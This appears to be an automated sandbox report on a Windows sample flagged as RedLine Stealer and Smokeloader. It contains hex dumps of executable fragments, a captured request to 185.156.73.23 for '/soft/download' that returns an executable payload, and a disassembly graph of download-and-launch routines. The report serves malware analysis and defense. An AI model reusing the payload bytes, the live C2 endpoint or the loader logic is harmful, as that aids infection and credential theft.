                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                Dec 20, 2024 16:55:08.487577915 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                                Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                                Dec 20, 2024 16:55:08.487598896 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                                Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                                Dec 20, 2024 16:55:08.488054037 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                                Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                                Dec 20, 2024 16:55:08.488068104 CET896INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                                Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                                Dec 20, 2024 16:55:08.488080978 CET1236INData Raw: 00 04 6f 9a 00 00 0a 1b 58 28 01 01 00 0a 02 28 b0 01 00 06 2a b2 02 28 ca 01 00 06 2c 12 02 7b cc 00 00 04 02 7b c2 00 00 04 6f 6f 00 00 0a 2a 02 7b cc 00 00 04 02 28 a9 01 00 06 6f 6f 00 00 0a 2a 1e 02 7b c4 00 00 04 2a 1e 02 7b c5 00 00 04 2a
                                                Data Ascii: oX((*(,{{oo*{(oo*{*{*J{ooo*J{oxo*{o((,{o*rp*6{o*2{o|*6{o}*v{o~}{o~*6{o
                                                Dec 20, 2024 16:55:08.488184929 CET1236INData Raw: 00 00 04 6f 77 00 00 0a 2a ba 02 7b f9 00 00 04 03 6f 79 00 00 0a 02 7b f9 00 00 04 02 7b f9 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a 32 02 7b fa 00 00 04 6f bd 00 00 0a 2a 36 02 7b fa 00 00 04 03 6f c1 00 00 0a
                                                Data Ascii: ow*{oy{{owox(+oy*2{o*6{o*J{ooo*z,{,{o/(z*B#su(v*B{(L*{*:}(M*{*}o,o(N(+}(M
                                                Dec 20, 2024 16:55:08.488255978 CET1236INData Raw: 02 7b 23 01 00 04 03 6f 6f 00 00 0a 02 7b 24 01 00 04 02 7b 23 01 00 04 6f f2 00 00 0a 6f 6f 00 00 0a 2a 32 02 7b 23 01 00 04 6f f2 00 00 0a 2a aa 02 03 7d 1f 01 00 04 02 7b 22 01 00 04 02 7b 1f 01 00 04 28 29 00 00 06 02 7b 23 01 00 04 02 7b 1f
                                                Data Ascii: {#oo{${#ooo*2{#o*}{"{(){#{()*{*6{"oo*2{"o*z,{!,{!o/(z*nd}%(r((2*{&*f}({+{(()*{(*f}){,{
                                                Dec 20, 2024 16:55:08.488270044 CET1236INData Raw: 03 00 06 2a 1e 02 7b 54 01 00 04 2a 96 02 03 7d 54 01 00 04 02 7b 56 01 00 04 02 7b 54 01 00 04 28 29 00 00 06 02 02 7b 54 01 00 04 28 29 00 00 06 2a f6 02 7b 56 01 00 04 02 28 99 00 00 0a 02 7b 52 01 00 04 5a 02 7b 53 01 00 04 5b 6f d6 00 00 0a
                                                Data Ascii: *{T*}T{V{T(){T()*{V({RZ{S[o{V{T(){T()*2{Vo*6{Voo*{R*{S*z,{U,{Uo/(z*R}Y((?*n}Y(o(?*"}W
                                                Dec 20, 2024 16:55:08.488282919 CET1236INData Raw: 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 02 6f a8 03 00 06 2a d6 02 73 fa 01 00 0a 7d 94 01 00 04 02 73 fa 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 03 02 6f 19 01 00 0a 02 6f a8
                                                Data Ascii: }s}(o*s}s}s}(oo*ss}{o{rpo{o*{os}{o(*j,3os**os*{*"}*F(
                                                Dec 20, 2024 16:55:08.607319117 CET1236INData Raw: 02 7b e5 01 00 04 6f cf 00 00 0a 02 7b e5 01 00 04 6f 2a 02 00 0a 02 03 28 7a 00 00 0a 2a ae 02 28 7f 00 00 0a 02 72 e0 1f 00 70 28 85 00 00 0a 02 02 fe 06 4a 04 00 06 73 89 00 00 0a 28 93 00 00 0a 02 16 28 97 00 00 0a 2a d6 02 28 35 01 00 0a 02
                                                Data Ascii: {o{o*(z*(rp(Js((*(5(i(p (H(Y((Z*zuoa}uo&*{*"}*{*"}*z,{,{o/(T*{*"}*


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.749917185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:55:09.562958956 CET394OUTGET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: s
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:55:11.171014071 CET1236INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:55:10 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="soft";
                                                Content-Length: 1502720
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-
                                                Dec 20, 2024 16:55:11.171147108 CET1236INData Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04
                                                Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
                                                Dec 20, 2024 16:55:11.171183109 CET1236INData Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70
                                                Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
                                                Dec 20, 2024 16:55:11.171402931 CET1236INData Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04
                                                Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
                                                Dec 20, 2024 16:55:11.171437979 CET1236INData Raw: 7b 0b 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 0b 00 00 04 72 47 04 00 70 6f 42 00 00 0a 02 7b 0b 00 00 04 20 2c 05 00 00 20 81 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0b 00 00 04 1e 6f 45 00 00 0a 02 7b 0b 00 00 04 02 fe 06
                                                Data Ascii: {s@oA{rGpoB{ , sCoD{oE{skol{oi{rUp"@AsOoP{Es>o?{s@oA{rwpoB{ #sCoD{oE{rpo!
                                                Dec 20, 2024 16:55:11.171473026 CET1236INData Raw: 0f 00 00 04 28 76 00 00 0a 6f 77 00 00 0a 02 7b 0f 00 00 04 20 67 02 00 00 1f 34 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0f 00 00 04 1f 0d 6f 45 00 00 0a 02 7b 0f 00 00 04 16 6f 23 00 00 0a 02 7b 14 00 00 04 17 6f 69 00 00 0a 02 7b 14 00 00 04 72 35
                                                Data Ascii: (vow{ g4sCoD{oE{o#{oi{r5p"dAsOoP{ s>o?{s@oA{rpoB{ *sCoD{oE{r-po!{(so9{ot
                                                Dec 20, 2024 16:55:11.171510935 CET1236INData Raw: 02 7b 1a 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 1a 00 00 04 72 21 07 00 70 6f 42 00 00 0a 02 7b 1a 00 00 04 20 25 01 00 00 20 ee 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 1a 00 00 04 1a 6f 6f 00 00 0a 02 7b 1a 00 00 04 1b 6f
                                                Data Ascii: {s@oA{r!poB{ % sCoD{oo{op{oq{or{sgoh"A"As(( WsC((:{o;(:{o;(:{o;(
                                                Dec 20, 2024 16:55:11.171823025 CET1236INData Raw: 0a 6f 4c 00 00 0a 02 7b 1f 00 00 04 06 72 b5 04 00 70 6f 52 00 00 0a 74 50 00 00 01 6f 6d 00 00 0a 02 7b 1f 00 00 04 14 6f 6e 00 00 0a 02 7b 1f 00 00 04 20 71 04 00 00 1f 12 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 1f 00 00 04 1a 1b 1a 1b 73 40 00 00
                                                Data Ascii: oL{rpoRtPom{on{ qs>o?{s@oA{rpoB{Q?sCoD{oo{op{oq{or{ sgoh{ oi{ rUp"AsOoP{
                                                Dec 20, 2024 16:55:11.171859026 CET1236INData Raw: 23 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 23 00 00 04 19 6f 48 00 00 0a 02 7b 23 00 00 04 16 6f 49 00 00 0a 02 7b 23 00 00 04 72 a7 02 00 70 6f 4a 00 00 0a 02 7b 23 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 23 00 00 04 28 4d 00 00 0a 6f
                                                Data Ascii: #(<o9{#oH{#oI{#rpoJ{#(KoL{#(MoN{#r5p"AsOoP{#(<oQ{#rpoRtPoS{#oT{#oU{#oV{#oW{#oX{#oY{##
                                                Dec 20, 2024 16:55:11.171894073 CET1236INData Raw: 00 04 02 fe 06 24 00 00 06 73 67 00 00 0a 6f 68 00 00 0a 02 7b 26 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 26 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 26 00 00 04 19 6f 48 00 00 0a 02 7b 26 00 00 04 16 6f 49 00 00 0a 02 7b 26 00 00 04 72
                                                Data Ascii: $sgoh{&(FoG{&(<o9{&oH{&oI{&rSpoJ{&(KoL{&(MoN{&r5p"AsOoP{&(<oQ{&rpoRtPoS{&oT{&oU{&oV{&oW
                                                Dec 20, 2024 16:55:11.291018009 CET1236INData Raw: 7b 2c 00 00 04 1f 20 20 6e 01 00 00 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 2c 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 2c 00 00 04 72 21 07 00 70 6f 42 00 00 0a 02 7b 2c 00 00 04 20 09 01 00 00 20 10 01 00 00 73 43 00 00 0a 6f 44 00
                                                Data Ascii: {, ns>o?{,s@oA{,r!poB{, sCoD{,oo{,op{,oq{,or{,&sgoh"A"As(( PsC((:{o;(:{"o;(:


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:10:53:42
                                                Start date:20/12/2024
                                                Path:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\zSmMqGGeVy.exe"
                                                Imagebase:0x400000
                                                File size:1'903'104 bytes
                                                MD5 hash:83AA26BD8755E994141C4B6D525307BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:10:55:14
                                                Start date:20/12/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480
                                                Imagebase:0xc90000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.5%
                                                  Dynamic/Decrypted Code Coverage:20%
                                                  Signature Coverage:11.7%
                                                  Total number of Nodes:1107
                                                  Total number of Limit Nodes:24
                                                  execution_graph 36756 10001f20 36799 10005956 GetSystemTimeAsFileTime 36756->36799 36758 10001f48 36801 100059d5 36758->36801 36760 10001f4f CallUnexpected 36804 10001523 36760->36804 36762 10002174 36834 100010a3 36762->36834 36767 10002025 36837 10001cdd 49 API calls __EH_prolog3_GS 36767->36837 36770 1000202e 36771 10002164 36770->36771 36838 100059b4 37 API calls _unexpected 36770->36838 36773 10001bb9 25 API calls 36771->36773 36775 10002172 36773->36775 36774 10002040 36839 10001c33 39 API calls 36774->36839 36775->36762 36777 10002052 36840 10002493 27 API calls __InternalCxxFrameHandler 36777->36840 36779 1000205f 36841 10002230 27 API calls __InternalCxxFrameHandler 36779->36841 36781 10002079 36842 10002230 27 API calls __InternalCxxFrameHandler 36781->36842 36783 1000209f 36843 1000219f 27 API calls __InternalCxxFrameHandler 36783->36843 36785 100020a9 36844 10001bb9 36785->36844 36788 10001bb9 25 API calls 36789 100020bb 36788->36789 36790 10001bb9 25 API calls 36789->36790 36791 100020c4 36790->36791 36848 10001725 8 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 36791->36848 36793 100020df CallUnexpected 36794 10002100 CreateProcessA 36793->36794 36795 10002135 36794->36795 36796 1000213c ShellExecuteA 36794->36796 36795->36796 36797 1000215b 36795->36797 36796->36797 36798 10001bb9 25 API calls 36797->36798 36798->36771 36800 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 36799->36800 36800->36758 36849 10006e9c GetLastError 36801->36849 36805 1000152f __EH_prolog3_GS 36804->36805 36893 1000184b 36805->36893 36807 10001593 36897 1000190a 36807->36897 36809 100015ff 36902 1000179a 36809->36902 36810 10001541 36810->36807 36816 1000179a 27 API calls 36810->36816 36812 1000160d 36907 10005939 36812->36907 36815 10001650 InternetSetOptionA InternetConnectA 36817 10001692 HttpOpenRequestA 36815->36817 36818 100016e8 InternetCloseHandle 36815->36818 36816->36807 36823 100016e2 InternetCloseHandle 36817->36823 36824 100016bc 36817->36824 36820 100016eb 36818->36820 36819 10001704 36822 10001bb9 25 API calls 36819->36822 36820->36819 36956 10001bdc 25 API calls 36820->36956 36825 1000171b 36822->36825 36823->36818 36910 100010c7 36824->36910 36957 1000e8a5 36825->36957 36830 100016d3 36924 10001175 36830->36924 36831 100016df InternetCloseHandle 36831->36823 36835 100010ad 36834->36835 36836 100010bd CoUninitialize 36835->36836 36837->36770 36838->36774 36839->36777 36840->36779 36841->36781 36842->36783 36843->36785 36845 10001bc4 36844->36845 36846 10001bcc 36844->36846 37008 10001bdc 25 API calls 36845->37008 36846->36788 36848->36793 36850 10006eb3 36849->36850 36851 10006eb9 36849->36851 36878 10007580 6 API calls __dosmaperr 36850->36878 36855 10006ebf SetLastError 36851->36855 36879 100075bf 6 API calls __dosmaperr 36851->36879 36854 10006ed7 36854->36855 36856 10006edb 36854->36856 36862 10006f53 36855->36862 36863 100059df 36855->36863 36880 10007aa7 14 API calls 2 library calls 36856->36880 36858 10006ee7 36860 10006f06 36858->36860 36861 10006eef 36858->36861 36888 100075bf 6 API calls __dosmaperr 36860->36888 36881 100075bf 6 API calls __dosmaperr 36861->36881 36891 10006928 37 API calls CallUnexpected 36862->36891 36863->36760 36867 10006efd 36882 10007a3c 36867->36882 36869 10006f12 36870 10006f16 36869->36870 36871 10006f27 36869->36871 36889 100075bf 6 API calls __dosmaperr 36870->36889 36890 10006c9e 14 API calls __dosmaperr 36871->36890 36875 10006f32 36877 10007a3c _free 14 API calls 36875->36877 36876 10006f03 36876->36855 36877->36876 36878->36851 36879->36854 36880->36858 36881->36867 36883 10007a47 RtlFreeHeap 36882->36883 36887 10007a70 _free 36882->36887 36884 10007a5c 36883->36884 36883->36887 36892 10005926 14 API calls __dosmaperr 36884->36892 36886 10007a62 GetLastError 36886->36887 36887->36876 36888->36869 36889->36867 36890->36875 36892->36886 36894 10001868 36893->36894 36894->36894 36895 1000190a 27 API calls 36894->36895 36896 1000187c 36895->36896 36896->36810 36898 10001978 36897->36898 36901 10001920 __InternalCxxFrameHandler 36897->36901 36960 10001a59 27 API calls std::_Xinvalid_argument 36898->36960 36901->36809 36903 100017eb 36902->36903 36906 100017b3 __InternalCxxFrameHandler 36902->36906 36961 10001884 27 API calls 36903->36961 36906->36812 36962 100070ee 36907->36962 36911 100010d3 __EH_prolog3_GS 36910->36911 36912 1000184b 27 API calls 36911->36912 36913 100010e3 HttpAddRequestHeadersA 36912->36913 36988 100017f1 36913->36988 36915 10001112 HttpAddRequestHeadersA 36916 100017f1 27 API calls 36915->36916 36917 10001132 HttpAddRequestHeadersA 36916->36917 36918 100017f1 27 API calls 36917->36918 36919 10001152 HttpAddRequestHeadersA 36918->36919 36920 10001bb9 25 API calls 36919->36920 36921 1000116d 36920->36921 36922 1000e8a5 5 API calls 36921->36922 36923 10001172 HttpSendRequestA 36922->36923 36923->36830 36923->36831 36925 10001184 __EH_prolog3_GS 36924->36925 36926 100011c5 InternetSetFilePointer 36925->36926 36927 100011e3 InternetReadFile 36926->36927 36929 1000121d __InternalCxxFrameHandler 36927->36929 36928 10001260 CallUnexpected 36930 1000127d HttpQueryInfoA 36928->36930 36929->36927 36929->36928 36931 100012a6 CoCreateInstance 36930->36931 36932 1000150a 36930->36932 36931->36932 36934 100012d8 36931->36934 36933 1000e8a5 5 API calls 36932->36933 36935 10001520 36933->36935 36934->36932 36936 1000184b 27 API calls 36934->36936 36935->36831 36937 100012f7 36936->36937 36993 10001006 30 API calls 36937->36993 36939 1000130c 36940 10001bb9 25 API calls 36939->36940 36946 1000134f CallUnexpected 36940->36946 36941 1000149d 36997 10005926 14 API calls __dosmaperr 36941->36997 36943 100014ae __InternalCxxFrameHandler 36943->36932 36944 10001427 __InternalCxxFrameHandler 36944->36941 36944->36943 36947 100014aa CallUnexpected 36944->36947 36945 100014a2 36999 1000584c 25 API calls __strnicoll 36945->36999 36946->36943 36946->36944 36950 10001456 36946->36950 36951 10001449 36946->36951 36947->36943 36998 10005926 14 API calls __dosmaperr 36947->36998 36950->36944 36995 10005926 14 API calls __dosmaperr 36950->36995 36994 10005926 14 API calls __dosmaperr 36951->36994 36953 1000144e 36996 1000584c 25 API calls __strnicoll 36953->36996 36956->36819 37000 100026ff 36957->37000 36959 10001722 36959->36762 36959->36767 36966 10007102 36962->36966 36963 10007106 36965 10001629 InternetOpenA 36963->36965 36981 10005926 14 API calls __dosmaperr 36963->36981 36965->36815 36965->36820 36966->36963 36966->36965 36968 10007140 36966->36968 36967 10007130 36982 1000584c 25 API calls __strnicoll 36967->36982 36983 100069d1 37 API calls 2 library calls 36968->36983 36971 1000714c 36972 10007156 36971->36972 36975 1000716d 36971->36975 36984 1000a31e 25 API calls 2 library calls 36972->36984 36974 100071ef 36974->36965 36985 10005926 14 API calls __dosmaperr 36974->36985 36975->36974 36976 10007244 36975->36976 36976->36965 36987 10005926 14 API calls __dosmaperr 36976->36987 36979 10007238 36986 1000584c 25 API calls __strnicoll 36979->36986 36981->36967 36982->36965 36983->36971 36984->36965 36985->36979 36986->36965 36987->36965 36989 100017ff 36988->36989 36989->36989 36991 1000180d __InternalCxxFrameHandler 36989->36991 36992 1000188f 27 API calls __InternalCxxFrameHandler 36989->36992 36991->36915 36992->36991 36993->36939 36994->36953 36995->36953 36996->36944 36997->36945 36998->36945 36999->36943 37001 10002707 37000->37001 37002 10002708 IsProcessorFeaturePresent 37000->37002 37001->36959 37004 10002b1c 37002->37004 37007 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37004->37007 37006 10002bff 37006->36959 37007->37006 37008->36846 37009 4034c0 CryptAcquireContextW 37010 40360a GetLastError CryptReleaseContext 37009->37010 37011 40354e CryptCreateHash 37009->37011 37012 403754 37010->37012 37011->37010 37013 403572 37011->37013 37014 40377a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37012->37014 37016 4037a2 37012->37016 37033 409035 37013->37033 37058 408ec2 37014->37058 37065 40c26f 37016->37065 37018 40379e 37019 4035aa 37047 40e46b 37019->37047 37024 4035e6 CryptDeriveKey 37024->37010 37026 403625 37024->37026 37025 4035d8 GetLastError 37025->37012 37051 40e2bd 37026->37051 37028 40362b __InternalCxxFrameHandler 37029 409035 27 API calls 37028->37029 37032 40364a __InternalCxxFrameHandler 37029->37032 37030 403748 CryptDestroyKey 37030->37012 37031 4036bc CryptDecrypt 37031->37030 37031->37032 37032->37030 37032->37031 37035 408ff7 37033->37035 37034 40e2bd ___std_exception_copy 15 API calls 37034->37035 37035->37034 37036 409016 37035->37036 37038 409018 37035->37038 37072 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 37035->37072 37036->37019 37039 401600 Concurrency::cancel_current_task 37038->37039 37041 409022 37038->37041 37070 40a370 RaiseException 37039->37070 37073 40a370 RaiseException 37041->37073 37042 40161c 37071 40a131 26 API calls 2 library calls 37042->37071 37045 4097b1 37046 401643 37046->37019 37048 40e479 37047->37048 37074 40e2c8 37048->37074 37056 41249e _unexpected 37051->37056 37052 4124dc 37112 40c339 14 API calls __dosmaperr 37052->37112 37054 4124c7 RtlAllocateHeap 37055 4124da 37054->37055 37054->37056 37055->37028 37056->37052 37056->37054 37111 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 37056->37111 37059 408eca 37058->37059 37060 408ecb IsProcessorFeaturePresent 37058->37060 37059->37018 37062 408f12 37060->37062 37113 408ed5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37062->37113 37064 408ff5 37064->37018 37114 40c1fb 25 API calls 2 library calls 37065->37114 37067 40c27e 37115 40c28c 11 API calls __CreateFrameInfo 37067->37115 37069 40c28b 37070->37042 37071->37046 37072->37035 37073->37045 37075 40e2df 37074->37075 37076 40e2f1 37075->37076 37077 40e309 37075->37077 37092 4035bc CryptHashData 37075->37092 37101 40c339 14 API calls __dosmaperr 37076->37101 37103 40c369 37 API calls 2 library calls 37077->37103 37080 40e2f6 37102 40c25f 25 API calls _mbstowcs 37080->37102 37081 40e314 37083 40e341 37081->37083 37084 40e322 37081->37084 37086 40e413 37083->37086 37087 40e349 37083->37087 37104 413393 19 API calls 3 library calls 37084->37104 37086->37092 37109 4132ab MultiByteToWideChar 37086->37109 37087->37092 37105 4132ab MultiByteToWideChar 37087->37105 37090 40e38b 37090->37092 37093 40e396 GetLastError 37090->37093 37091 40e43d 37091->37092 37110 40c339 14 API calls __dosmaperr 37091->37110 37092->37024 37092->37025 37094 40e3f6 37093->37094 37100 40e3a1 37093->37100 37094->37092 37108 40c339 14 API calls __dosmaperr 37094->37108 37097 40e3e0 37107 4132ab MultiByteToWideChar 37097->37107 37100->37094 37100->37097 37106 413271 37 API calls _mbstowcs 37100->37106 37101->37080 37102->37092 37103->37081 37104->37092 37105->37090 37106->37100 37107->37094 37108->37092 37109->37091 37110->37092 37111->37056 37112->37055 37113->37064 37114->37067 37115->37069 37116 4020c0 37117 40213b 37116->37117 37118 4020dd 37116->37118 37120 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37117->37120 37118->37117 37119 4020e3 CreateFileA 37118->37119 37119->37117 37121 402103 WriteFile CloseHandle 37119->37121 37122 402149 37120->37122 37123 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37121->37123 37124 402135 37123->37124 37125 401880 37126 4018e9 InternetSetFilePointer InternetReadFile 37125->37126 37127 40197d __cftof 37126->37127 37128 4019a2 HttpQueryInfoA 37127->37128 37129 401d25 37128->37129 37130 4019c6 CoCreateInstance 37128->37130 37131 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37129->37131 37130->37129 37133 4019ff 37130->37133 37132 401d50 37131->37132 37133->37129 37153 402470 37133->37153 37135 401a5c MultiByteToWideChar 37136 409035 27 API calls 37135->37136 37137 401aae MultiByteToWideChar 37136->37137 37138 401b10 37137->37138 37138->37138 37168 402310 27 API calls 3 library calls 37138->37168 37140 401c00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37144 409035 27 API calls 37140->37144 37146 401cf1 37140->37146 37141 401b2c 37141->37140 37142 401d56 37141->37142 37143 40c26f 25 API calls 37142->37143 37145 401d5b 37143->37145 37147 401c37 37144->37147 37146->37129 37147->37146 37148 409035 27 API calls 37147->37148 37152 401cc4 37147->37152 37149 401cb4 37148->37149 37169 4014b0 25 